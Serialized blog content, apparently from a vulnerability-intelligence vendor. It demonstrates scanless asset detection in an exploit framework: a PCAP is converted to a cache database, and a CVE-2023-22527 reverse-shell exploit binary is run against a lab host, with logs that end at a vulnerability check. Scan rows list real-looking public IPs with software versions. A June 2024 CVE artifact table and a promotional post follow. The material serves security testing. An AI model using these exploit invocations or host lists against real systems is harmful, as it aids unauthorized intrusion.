NG\u002FMF",[1373,70912,17472],{"class":1397},[1373,70914,467],{"class":2206},[1373,70916,17472],{"class":1397},[1373,70918,70919],{"class":2206},"66961",[1373,70921,17472],{"class":1397},[1373,70923,70924],{"class":2206},"155.33.36.94",[1373,70926,17472],{"class":1397},[1373,70928,69634],{"class":2206},[1373,70930,70931,70934,70936,70939,70941,70943,70945,70947,70949,70952,70954,70957,70959],{"class":1375,"line":4792},[1373,70932,70933],{"class":2206},"109011",[1373,70935,17472],{"class":1397},[1373,70937,70938],{"class":2206},"1721409204",[1373,70940,17472],{"class":1397},[1373,70942,70141],{"class":2206},[1373,70944,17472],{"class":1397},[1373,70946,467],{"class":2206},[1373,70948,17472],{"class":1397},[1373,70950,70951],{"class":2206},"8.5.12",[1373,70953,17472],{"class":1397},[1373,70955,70956],{"class":2206},"129.10.117.205",[1373,70958,17472],{"class":1397},[1373,70960,69634],{"class":2206},[1373,70962,70963,70966,70968,70971,70973,70976,70978,70980,70982,70985,70987],{"class":1375,"line":4798},[1373,70964,70965],{"class":2206},"66874",[1373,70967,17472],{"class":1397},[1373,70969,70970],{"class":2206},"1721408317",[1373,70972,17472],{"class":1397},[1373,70974,70975],{"class":2206},"Grafana",[1373,70977,17472],{"class":1397},[1373,70979,467
],{"class":2206},[1373,70981,55462],{"class":1397},[1373,70983,70984],{"class":2206},"129.10.134.74",[1373,70986,17472],{"class":1397},[1373,70988,70989],{"class":2206},"3000\n",[1373,70991,70992,70995,70997,71000,71002,71004,71007,71010,71012,71014,71016,71019,71021,71024,71026],{"class":1375,"line":4806},[1373,70993,70994],{"class":2206},"64903",[1373,70996,17472],{"class":1397},[1373,70998,70999],{"class":2206},"1721408289",[1373,71001,17472],{"class":1397},[1373,71003,3149],{"class":2206},[1373,71005,71006],{"class":1391}," HTTP",[1373,71008,71009],{"class":1391}," Server",[1373,71011,17472],{"class":1397},[1373,71013,467],{"class":2206},[1373,71015,17472],{"class":1397},[1373,71017,71018],{"class":2206},"2.4.59",[1373,71020,17472],{"class":1397},[1373,71022,71023],{"class":2206},"129.10.111.148",[1373,71025,17472],{"class":1397},[1373,71027,69615],{"class":2206},[18,71029,71030],{},"go-exploit-cache also supports converting a PCAP into a cache database. We deliver PCAPs with our exploits to all Initial Access customers, so they are also able to test the scanners asset detection and version scanning logic without configuring a target themselves. Once again, we provided a Confluence sample in the go-exploit-cache repository. 
You can test it like so:",[1354,71032,71034],{"className":31740,"code":71033,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit-cache$ .\u002Fbuild\u002Fgo-exploit-cache -type pcap -in .\u002Ftest\u002Ftestdata\u002Fconfluence-exploit.pcapng -out confluence.db\n2024\u002F07\u002F23 10:45:21 Locating all HTTP requests...\n2024\u002F07\u002F23 10:45:21 Locating all HTTP responses...\n2024\u002F07\u002F23 10:45:21 Generating database entries...\n",[886,71035,71036,71056,71074,71089],{"__ignoreMap":219},[1373,71037,71038,71040,71042,71044,71047,71049,71052,71054],{"class":1375,"line":1376},[1373,71039,69433],{"class":2206},[1373,71041,69436],{"class":1391},[1373,71043,69439],{"class":2209},[1373,71045,71046],{"class":1391}," pcap",[1373,71048,69445],{"class":2209},[1373,71050,71051],{"class":1391}," .\u002Ftest\u002Ftestdata\u002Fconfluence-exploit.pcapng",[1373,71053,69451],{"class":2209},[1373,71055,69454],{"class":1391},[1373,71057,71058,71061,71064,71067,71069,71071],{"class":1375,"line":220},[1373,71059,71060],{"class":2206},"2024\u002F07\u002F23",[1373,71062,71063],{"class":1391}," 10:45:21",[1373,71065,71066],{"class":1391}," Locating",[1373,71068,57374],{"class":1391},[1373,71070,71006],{"class":1391},[1373,71072,71073],{"class":1391}," requests...\n",[1373,71075,71076,71078,71080,71082,71084,71086],{"class":1375,"line":1266},[1373,71077,71060],{"class":2206},[1373,71079,71063],{"class":1391},[1373,71081,71066],{"class":1391},[1373,71083,57374],{"class":1391},[1373,71085,71006],{"class":1391},[1373,71087,71088],{"class":1391}," responses...\n",[1373,71090,71091,71093,71095,71097,71099],{"class":1375,"line":1852},[1373,71092,71060],{"class":2206},[1373,71094,71063],{"class":1391},[1373,71096,69513],{"class":1391},[1373,71098,69516],{"class":1391},[1373,71100,69519],{"class":1391},[18,71102,71103],{},"The resulting database contains two cached 
queries:",[1354,71105,71107],{"className":31740,"code":71106,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit-cache$ sqlite3 confluence.db\nSQLite version 3.31.1 2020-01-27 19:55:54\nEnter \".help\" for usage hints.\nsqlite> select rhost,rport,uri from http_cache;\n10.9.49.88|8090|\u002F\n10.9.49.88|8090|\u002Flogin.action?os_destination=%2Findex.action&permissionViolation=true\n",[886,71108,71109,71117,71129,71145,71162,71177],{"__ignoreMap":219},[1373,71110,71111,71113,71115],{"class":1375,"line":1376},[1373,71112,69433],{"class":2206},[1373,71114,69543],{"class":1391},[1373,71116,69454],{"class":1391},[1373,71118,71119,71121,71123,71125,71127],{"class":1375,"line":220},[1373,71120,69550],{"class":2206},[1373,71122,45880],{"class":1391},[1373,71124,69555],{"class":5467},[1373,71126,69558],{"class":1391},[1373,71128,69561],{"class":1391},[1373,71130,71131,71133,71135,71137,71139,71141,71143],{"class":1375,"line":1266},[1373,71132,55798],{"class":2206},[1373,71134,4883],{"class":1387},[1373,71136,69570],{"class":1391},[1373,71138,183],{"class":1387},[1373,71140,55807],{"class":1391},[1373,71142,69577],{"class":1391},[1373,71144,69580],{"class":1391},[1373,71146,71147,71149,71151,71153,71156,71158,71160],{"class":1375,"line":1852},[1373,71148,69585],{"class":2206},[1373,71150,69588],{"class":4640},[1373,71152,49878],{"class":1391},[1373,71154,71155],{"class":1391}," 
rhost,rport,uri",[1373,71157,67067],{"class":1391},[1373,71159,69598],{"class":1391},[1373,71161,4912],{"class":1383},[1373,71163,71164,71167,71169,71172,71174],{"class":1375,"line":4692},[1373,71165,71166],{"class":2206},"10.9.49.88",[1373,71168,17472],{"class":1397},[1373,71170,71171],{"class":2206},"8090",[1373,71173,17472],{"class":1397},[1373,71175,71176],{"class":2206},"\u002F\n",[1373,71178,71179,71181,71183,71185,71187,71190,71193,71195,71198,71200],{"class":1375,"line":4724},[1373,71180,71166],{"class":2206},[1373,71182,17472],{"class":1397},[1373,71184,71171],{"class":2206},[1373,71186,17472],{"class":1397},[1373,71188,71189],{"class":2206},"\u002Flogin.action?os_destination",[1373,71191,71192],{"class":1391},"=%2Findex.action",[1373,71194,7218],{"class":1383},[1373,71196,71197],{"class":4640},"permissionViolation",[1373,71199,5417],{"class":1397},[1373,71201,45801],{"class":1391},[18,71203,71204],{},"And, of course, our Confluence exploits are able to use this pcap-generated database to do a scanless asset detection and version scan.",[1354,71206,71208],{"className":31740,"code":71207,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Freverseshell$ .\u002Fbuild\u002Fcve-2023-22527_linux-arm64 -rhost 10.9.49.88 -rport 8090 -db ~\u002Fgo-exploit-cache\u002Fconfluence.db -v -c -fll TRACE\ntime=2024-07-23T10:47:41.284-04:00 level=DEBUG msg=\"Using the HTTP User-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F125.0.0.0 Safari\u002F537.36\"\ntime=2024-07-23T10:47:41.287-04:00 level=STATUS msg=\"Starting target\" index=0 host=10.9.49.88 port=8090 ssl=false \"ssl auto\"=false\ntime=2024-07-23T10:47:41.287-04:00 level=STATUS msg=\"Validating Confluence target\" host=10.9.49.88 port=8090\ntime=2024-07-23T10:47:41.288-04:00 level=TRACE msg=\"HTTP cache hit: http:\u002F\u002F10.9.49.88:8090\u002F\"\ntime=2024-07-23T10:47:41.289-04:00 level=SUCCESS msg=\"Target 
verification succeeded!\" host=10.9.49.88 port=8090 verified=true\ntime=2024-07-23T10:47:41.289-04:00 level=STATUS msg=\"Running a version check on the remote target\" host=10.9.49.88 port=8090\ntime=2024-07-23T10:47:41.289-04:00 level=TRACE msg=\"HTTP cache hit: http:\u002F\u002F10.9.49.88:8090\u002F\"\ntime=2024-07-23T10:47:41.289-04:00 level=VERSION msg=\"The reported version is 8.5.3\" host=10.9.49.88 port=8090 version=8.5.3\ntime=2024-07-23T10:47:41.290-04:00 level=SUCCESS msg=\"The target appears to be a vulnerable version!\" host=10.9.49.88 port=8090 vulnerable=yes\n",[886,71209,71210,71239,71264,71321,71357,71384,71427,71463,71487,71531],{"__ignoreMap":219},[1373,71211,71212,71214,71216,71218,71221,71223,71226,71228,71230,71232,71234,71236],{"class":1375,"line":1376},[1373,71213,69770],{"class":2206},[1373,71215,69781],{"class":1391},[1373,71217,38910],{"class":2209},[1373,71219,71220],{"class":5467}," 10.9.49.88",[1373,71222,45568],{"class":2209},[1373,71224,71225],{"class":5467}," 8090",[1373,71227,69798],{"class":2209},[1373,71229,70204],{"class":1391},[1373,71231,45584],{"class":2209},[1373,71233,45587],{"class":2209},[1373,71235,67171],{"class":2209},[1373,71237,71238],{"class":1391}," 
TRACE\n",[1373,71240,71241,71243,71245,71248,71250,71252,71254,71256,71258,71260,71262],{"class":1375,"line":220},[1373,71242,38930],{"class":4640},[1373,71244,5417],{"class":1397},[1373,71246,71247],{"class":1391},"2024-07-23T10:47:41.284-04:00",[1373,71249,38938],{"class":4640},[1373,71251,5417],{"class":1397},[1373,71253,67201],{"class":1391},[1373,71255,38946],{"class":4640},[1373,71257,5417],{"class":1397},[1373,71259,183],{"class":1387},[1373,71261,67210],{"class":1391},[1373,71263,19057],{"class":1387},[1373,71265,71266,71268,71270,71273,71275,71277,71279,71281,71283,71285,71287,71289,71291,71293,71295,71297,71299,71301,71303,71305,71307,71309,71311,71313,71315,71317,71319],{"class":1375,"line":1266},[1373,71267,38930],{"class":4640},[1373,71269,5417],{"class":1397},[1373,71271,71272],{"class":1391},"2024-07-23T10:47:41.287-04:00",[1373,71274,38938],{"class":4640},[1373,71276,5417],{"class":1397},[1373,71278,38943],{"class":1391},[1373,71280,38946],{"class":4640},[1373,71282,5417],{"class":1397},[1373,71284,183],{"class":1387},[1373,71286,38979],{"class":1391},[1373,71288,183],{"class":1387},[1373,71290,38984],{"class":4640},[1373,71292,5417],{"class":1397},[1373,71294,445],{"class":1391},[1373,71296,38991],{"class":4640},[1373,71298,5417],{"class":1397},[1373,71300,71166],{"class":1391},[1373,71302,38999],{"class":4640},[1373,71304,5417],{"class":1397},[1373,71306,71171],{"class":1391},[1373,71308,39007],{"class":4640},[1373,71310,5417],{"class":1397},[1373,71312,5971],{"class":1391},[1373,71314,4883],{"class":1387},[1373,71316,39016],{"class":1391},[1373,71318,183],{"class":1387},[1373,71320,39021],{"class":1391},[1373,71322,71323,71325,71327,71329,71331,71333,71335,71337,71339,71341,71343,71345,71347,71349,71351,71353,71355],{"class":1375,"line":1852},[1373,71324,38930],{"class":4640},[1373,71326,5417],{"class":1397},[1373,71328,71272],{"class":1391},[1373,71330,38938],{"class":4640},[1373,71332,5417],{"class":1397},[1373,71334,38943],{"class":1391},[1373,
71336,38946],{"class":4640},[1373,71338,5417],{"class":1397},[1373,71340,183],{"class":1387},[1373,71342,69881],{"class":1391},[1373,71344,183],{"class":1387},[1373,71346,38991],{"class":4640},[1373,71348,5417],{"class":1397},[1373,71350,71166],{"class":1391},[1373,71352,38999],{"class":4640},[1373,71354,5417],{"class":1397},[1373,71356,69644],{"class":1391},[1373,71358,71359,71361,71363,71366,71368,71370,71373,71375,71377,71379,71382],{"class":1375,"line":4692},[1373,71360,38930],{"class":4640},[1373,71362,5417],{"class":1397},[1373,71364,71365],{"class":1391},"2024-07-23T10:47:41.288-04:00",[1373,71367,38938],{"class":4640},[1373,71369,5417],{"class":1397},[1373,71371,71372],{"class":1391},"TRACE",[1373,71374,38946],{"class":4640},[1373,71376,5417],{"class":1397},[1373,71378,183],{"class":1387},[1373,71380,71381],{"class":1391},"HTTP cache hit: http:\u002F\u002F10.9.49.88:8090\u002F",[1373,71383,19057],{"class":1387},[1373,71385,71386,71388,71390,71393,71395,71397,71399,71401,71403,71405,71407,71409,71411,71413,71415,71417,71419,71421,71423,71425],{"class":1375,"line":4724},[1373,71387,38930],{"class":4640},[1373,71389,5417],{"class":1397},[1373,71391,71392],{"class":1391},"2024-07-23T10:47:41.289-04:00",[1373,71394,38938],{"class":4640},[1373,71396,5417],{"class":1397},[1373,71398,39062],{"class":1391},[1373,71400,38946],{"class":4640},[1373,71402,5417],{"class":1397},[1373,71404,183],{"class":1387},[1373,71406,45779],{"class":1391},[1373,71408,183],{"class":1387},[1373,71410,38991],{"class":4640},[1373,71412,5417],{"class":1397},[1373,71414,71166],{"class":1391},[1373,71416,38999],{"class":4640},[1373,71418,5417],{"class":1397},[1373,71420,71171],{"class":1391},[1373,71422,45796],{"class":4640},[1373,71424,5417],{"class":1397},[1373,71426,45801],{"class":1391},[1373,71428,71429,71431,71433,71435,71437,71439,71441,71443,71445,71447,71449,71451,71453,71455,71457,71459,71461],{"class":1375,"line":4756},[1373,71430,38930],{"class":4640},[1373,71432,5417],{"class":13
97},[1373,71434,71392],{"class":1391},[1373,71436,38938],{"class":4640},[1373,71438,5417],{"class":1397},[1373,71440,38943],{"class":1391},[1373,71442,38946],{"class":4640},[1373,71444,5417],{"class":1397},[1373,71446,183],{"class":1387},[1373,71448,45824],{"class":1391},[1373,71450,183],{"class":1387},[1373,71452,38991],{"class":4640},[1373,71454,5417],{"class":1397},[1373,71456,71166],{"class":1391},[1373,71458,38999],{"class":4640},[1373,71460,5417],{"class":1397},[1373,71462,69644],{"class":1391},[1373,71464,71465,71467,71469,71471,71473,71475,71477,71479,71481,71483,71485],{"class":1375,"line":4768},[1373,71466,38930],{"class":4640},[1373,71468,5417],{"class":1397},[1373,71470,71392],{"class":1391},[1373,71472,38938],{"class":4640},[1373,71474,5417],{"class":1397},[1373,71476,71372],{"class":1391},[1373,71478,38946],{"class":4640},[1373,71480,5417],{"class":1397},[1373,71482,183],{"class":1387},[1373,71484,71381],{"class":1391},[1373,71486,19057],{"class":1387},[1373,71488,71489,71491,71493,71495,71497,71499,71501,71503,71505,71507,71510,71512,71514,71516,71518,71520,71522,71524,71526,71528],{"class":1375,"line":4792},[1373,71490,38930],{"class":4640},[1373,71492,5417],{"class":1397},[1373,71494,71392],{"class":1391},[1373,71496,38938],{"class":4640},[1373,71498,5417],{"class":1397},[1373,71500,45854],{"class":1391},[1373,71502,38946],{"class":4640},[1373,71504,5417],{"class":1397},[1373,71506,183],{"class":1387},[1373,71508,71509],{"class":1391},"The reported version is 
8.5.3",[1373,71511,183],{"class":1387},[1373,71513,38991],{"class":4640},[1373,71515,5417],{"class":1397},[1373,71517,71166],{"class":1391},[1373,71519,38999],{"class":4640},[1373,71521,5417],{"class":1397},[1373,71523,71171],{"class":1391},[1373,71525,45880],{"class":4640},[1373,71527,5417],{"class":1397},[1373,71529,71530],{"class":1391},"8.5.3\n",[1373,71532,71533,71535,71537,71540,71542,71544,71546,71548,71550,71552,71554,71556,71558,71560,71562,71564,71566,71568,71570,71572],{"class":1375,"line":4798},[1373,71534,38930],{"class":4640},[1373,71536,5417],{"class":1397},[1373,71538,71539],{"class":1391},"2024-07-23T10:47:41.290-04:00",[1373,71541,38938],{"class":4640},[1373,71543,5417],{"class":1397},[1373,71545,39062],{"class":1391},[1373,71547,38946],{"class":4640},[1373,71549,5417],{"class":1397},[1373,71551,183],{"class":1387},[1373,71553,45908],{"class":1391},[1373,71555,183],{"class":1387},[1373,71557,38991],{"class":4640},[1373,71559,5417],{"class":1397},[1373,71561,71166],{"class":1391},[1373,71563,38999],{"class":4640},[1373,71565,5417],{"class":1397},[1373,71567,71171],{"class":1391},[1373,71569,45925],{"class":4640},[1373,71571,5417],{"class":1397},[1373,71573,45930],{"class":1391},[18,71575,71576,71577,71580,71581,71584],{},"Scanless makes a lot of sense for both attackers and defenders, and we don’t think there is any other framework that is doing quite what we are doing here. 
If you find this compelling, come hack with us on ",[47,71578,20558],{"href":14297,"rel":71579},[51]," or check out our ",[47,71582,1245],{"href":45535,"rel":71583},[51]," offering.",[2901,71586,71587],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span 
{color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sSsL9, html code.shiki .sSsL9{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}",{"title":219,"searchDepth":220,"depth":220,"links":71589},[71590,71591,71592,71593,71594],{"id":69408,"depth":220,"text":69409},{"id":69736,"depth":220,"text":69737},{"id":69752,"depth":220,"text":69753},{"id":70167,"depth":220,"text":70168},{"id":70643,"depth":220,"text":70644},"Demonstrating the new scanless feature in the go-exploit exploit 
framework.",{"slug":71597},"vulncheck-goes-scanless",{"title":69353,"description":71595},"blog\u002Fvulncheck-goes-scanless",[23275],"xbczeo3UfYP5mttPmACtEK6cKhloelUSJbj2sTv3Y_Y",{"id":71603,"title":71604,"articles":71605,"authors":71609,"body":71611,"date":69096,"description":72025,"extension":234,"image":7,"link":7,"meta":72026,"navigation":237,"path":72028,"seo":72029,"series":7,"stem":72030,"subtype":7,"tags":72031,"__hash__":72032},"blog\u002Fblog\u002Finitial-access-intelligence-june-2024.md","VulnCheck Initial Access Intelligence Update - June 2024",[71606],{"title":71607,"source":61436,"link":71608,"date":69142},"Risky Biz News: CrowdStrike faulty update affects 8.5 million Windows systems","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-crowdstrike-faulty-update-affects-8-5-million-windows-systems\u002F?ref=risky-business-news-newsletter",[71610],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":71612,"toc":72021},[71613,71615,71618,71624,71627,71643,71647,72014,72016],[18,71614,68846],{},[18,71616,71617],{},"In June 2024, VulnCheck developed new Initial Access Intelligence (IAI) artifacts for 15 CVEs, covering 13 different vendors and 13 different products.",[18,71619,71620],{},[68,71621],{":width":10862,"alt":71622,"src":71623},"Initial Access Intelligence - June 2024","\u002Fblog\u002Finitial-access-intelligence-june-2024\u002Fvulncheck-initial-access-june.png",[18,71625,71626],{},"To provide better visibility into these updates, we’ve broken down June’s Initial Access Intelligence Artifacts by CVE. 
For each CVE, we provide a range of detection tools including:",[22,71628,71629,71631,71633,71635,71637,71639,71641],{},[25,71630,325],{},[25,71632,59440],{},[25,71634,59443],{},[25,71636,59446],{},[25,71638,59449],{},[25,71640,59452],{},[25,71642,64745],{},[61,71644,71646],{"id":71645},"june-2024-initial-access-artifacts","June 2024 Initial Access Artifacts",[307,71648,71649,71671],{},[310,71650,71651],{},[313,71652,71653,71655,71657,71659,71661,71663,71665,71667,71669],{},[316,71654,59471],{},[316,71656,59474],{},[316,71658,319],{},[316,71660,59479],{},[316,71662,59482],{},[316,71664,59485],{},[316,71666,59488],{},[316,71668,61654],{},[316,71670,61657],{},[336,71672,71673,71696,71719,71742,71764,71786,71809,71832,71855,71878,71901,71923,71946,71969,71991],{},[313,71674,71675,71678,71681,71684,71686,71688,71690,71692,71694],{},[341,71676,71677],{},"Progress Telerik Report Server",[341,71679,71680],{},"2024-06-03",[341,71682,71683],{},"CVE-2024-4358",[341,71685],{},[341,71687],{},[341,71689,59510],{},[341,71691,59510],{},[341,71693,59510],{},[341,71695],{},[313,71697,71698,71701,71704,71707,71709,71711,71713,71715,71717],{},[341,71699,71700],{},"Apache HugeGraph Gremlin Filter Bypass",[341,71702,71703],{},"2024-06-05",[341,71705,71706],{},"CVE-2024-27348",[341,71708,59510],{},[341,71710,59510],{},[341,71712,59510],{},[341,71714,59510],{},[341,71716,59510],{},[341,71718],{},[313,71720,71721,71724,71727,71730,71732,71734,71736,71738,71740],{},[341,71722,71723],{},"Check Point Security Gateway Path Traversal",[341,71725,71726],{},"2024-06-06",[341,71728,71729],{},"CVE-2024-24919",[341,71731,59510],{},[341,71733],{},[341,71735,59510],{},[341,71737,59510],{},[341,71739,59510],{},[341,71741],{},[313,71743,71744,71747,71749,71752,71754,71756,71758,71760,71762],{},[341,71745,71746],{},"Apache OFBiz Path Traversal 
RCE",[341,71748,71726],{},[341,71750,71751],{},"CVE-2024-32113",[341,71753,59510],{},[341,71755,59510],{},[341,71757,59510],{},[341,71759,59510],{},[341,71761,59510],{},[341,71763],{},[313,71765,71766,71769,71772,71774,71776,71778,71780,71782,71784],{},[341,71767,71768],{},"PHP CGI Argument Injection",[341,71770,71771],{},"2024-06-08",[341,71773,1510],{},[341,71775,59510],{},[341,71777,59510],{},[341,71779,59510],{},[341,71781,59510],{},[341,71783,59510],{},[341,71785],{},[313,71787,71788,71791,71794,71797,71799,71801,71803,71805,71807],{},[341,71789,71790],{},"Kyocera MFP Address Book Credential Leak",[341,71792,71793],{},"2024-06-12",[341,71795,71796],{},"CVE-2022-1026",[341,71798,59510],{},[341,71800],{},[341,71802,59510],{},[341,71804,59510],{},[341,71806,59510],{},[341,71808],{},[313,71810,71811,71814,71817,71820,71822,71824,71826,71828,71830],{},[341,71812,71813],{},"Sophos UTM 9 WebAdmin SID Command Injection",[341,71815,71816],{},"2024-06-13",[341,71818,71819],{},"CVE-2020-25223",[341,71821,59510],{},[341,71823],{},[341,71825,59510],{},[341,71827,59510],{},[341,71829,59510],{},[341,71831],{},[313,71833,71834,71837,71840,71843,71845,71847,71849,71851,71853],{},[341,71835,71836],{},"SolarWinds Serv-U InternalDir Directory Traversal",[341,71838,71839],{},"2024-06-14",[341,71841,71842],{},"CVE-2024-28995",[341,71844,59510],{},[341,71846,59510],{},[341,71848,59510],{},[341,71850,59510],{},[341,71852,59510],{},[341,71854],{},[313,71856,71857,71860,71863,71866,71868,71870,71872,71874,71876],{},[341,71858,71859],{},"Build Your Own Botnet Web UI RCE",[341,71861,71862],{},"2024-06-18",[341,71864,71865],{},"CVE-2024-6131",[341,71867,59510],{},[341,71869],{},[341,71871,59510],{},[341,71873,59510],{},[341,71875,59510],{},[341,71877],{},[313,71879,71880,71883,71886,71889,71891,71893,71895,71897,71899],{},[341,71881,71882],{},"Ivanti Endpoint Manager (EPM) SQL Injection 
RCE",[341,71884,71885],{},"2024-06-21",[341,71887,71888],{},"CVE-2024-29824",[341,71890,59510],{},[341,71892],{},[341,71894,59510],{},[341,71896,59510],{},[341,71898,59510],{},[341,71900],{},[313,71902,71903,71906,71908,71911,71913,71915,71917,71919,71921],{},[341,71904,71905],{},"Zyxel NAS simZysh Python Injection",[341,71907,71885],{},[341,71909,71910],{},"CVE-2024-29973",[341,71912,59510],{},[341,71914],{},[341,71916,59510],{},[341,71918,59510],{},[341,71920,59510],{},[341,71922],{},[313,71924,71925,71928,71931,71934,71936,71938,71940,71942,71944],{},[341,71926,71927],{},"Empire C2 path traversal RCE",[341,71929,71930],{},"2024-06-24",[341,71932,71933],{},"CVE-2024-6127",[341,71935,59510],{},[341,71937],{},[341,71939,59510],{},[341,71941],{},[341,71943],{},[341,71945],{},[313,71947,71948,71951,71954,71957,71959,71961,71963,71965,71967],{},[341,71949,71950],{},"AVideo Remote Code Execution",[341,71952,71953],{},"2024-06-25",[341,71955,71956],{},"CVE-2024-31819",[341,71958,59510],{},[341,71960,59510],{},[341,71962,59510],{},[341,71964,59510],{},[341,71966,59510],{},[341,71968,59510],{},[313,71970,71971,71974,71976,71979,71981,71983,71985,71987,71989],{},[341,71972,71973],{},"XWiki Database Search Code Injection",[341,71975,71953],{},[341,71977,71978],{},"CVE-2024-31982",[341,71980,59510],{},[341,71982,59510],{},[341,71984,59510],{},[341,71986,59510],{},[341,71988,59510],{},[341,71990],{},[313,71992,71993,71996,71999,72002,72004,72006,72008,72010,72012],{},[341,71994,71995],{},"Progress MOVEit Transfer SFTP Authentication 
Bypass",[341,71997,71998],{},"2024-06-28",[341,72000,72001],{},"CVE-2024-5806",[341,72003],{},[341,72005,59510],{},[341,72007,59510],{},[341,72009,59510],{},[341,72011,59510],{},[341,72013,59510],{},[61,72015,59851],{"id":59850},[18,72017,59854,72018],{},[47,72019,59857],{"href":59857,"rel":72020},[51],{"title":219,"searchDepth":220,"depth":220,"links":72022},[72023,72024],{"id":71645,"depth":220,"text":71646},{"id":59850,"depth":220,"text":59851},"In June 2024, we developed new Initial Access Intelligence (IAI) artifacts for 15 CVEs, covering 13 different vendors and 13 different products.",{"slug":72027},"initial-access-intelligence-june-2024","\u002Fblog\u002Finitial-access-intelligence-june-2024",{"title":71604,"description":72025},"blog\u002Finitial-access-intelligence-june-2024",[1281],"UqUZsmgHpVp7glv8EsM0TH0ZN53aGru4XVpbJYFNR7E",{"id":72034,"title":72035,"articles":7,"authors":72036,"body":72038,"date":69073,"description":72123,"extension":234,"image":7,"link":7,"meta":72124,"navigation":237,"path":72126,"seo":72127,"series":7,"stem":72128,"subtype":7,"tags":72129,"__hash__":72130},"blog\u002Fblog\u002Ftop-5-reasons-to-use-vulncheck-community.md","Top 5 Reasons to Use VulnCheck Community",[72037],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":72039,"toc":72115},[72040,72043,72046,72050,72057,72061,72068,72072,72075,72082,72086,72093,72097,72104,72106,72108,72110],[18,72041,72042],{},"VulnCheck Community provides security and product teams with access to the premier source for open Vulnerability and Exploit Intelligence including VulnCheck KEV, NVD++ and VulnCheck XDB.",[18,72044,72045],{},"To help you gain better insight into the value of VulnCheck Community, we've put together the top 5 reasons to use VulnCheck Community.",[61,72047,72049],{"id":72048},"_2600-known-exploited-vulnerabilities","2,600+ Known Exploited Vulnerabilities",[18,72051,72052,72056],{},[47,72053,72055],{"href":2871,"rel":72054},[51],"VulnCheck Known Exploited 
Vulnerabilities (KEV) catalog"," makes it easy for enterprises, government agencies, and vendors to know which vulnerabilities have been reported as exploited in the wild. VulnCheck provides citations for each and every CVE, so security teams have a clearer picture of why the vulnerability is on the list.",[61,72058,72060],{"id":72059},"fast-accurate-cpe","Fast & Accurate CPE",[18,72062,72063,72064],{},"VulnCheck NVD++ delivers the NIST NVD enriched with VulnCheck Common Platform Enumeration (CPE) data to help fill the gap that NVD has left as it slowed processing of CVEs.\n",[47,72065,72066],{"href":72066,"rel":72067},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fnvd-cpe",[51],[61,72069,72071],{"id":72070},"an-enterprise-alternative-to-nist-nvd","An Enterprise Alternative to NIST NVD",[18,72073,72074],{},"With NIST NVD delivering inconsistent and unreliable service, VulnCheck fills the gap, delivering reliable access to NVD++ and VulnCheck KEV services through enterprise-grade APIs that can be accessed by any VulnCheck Community member. 
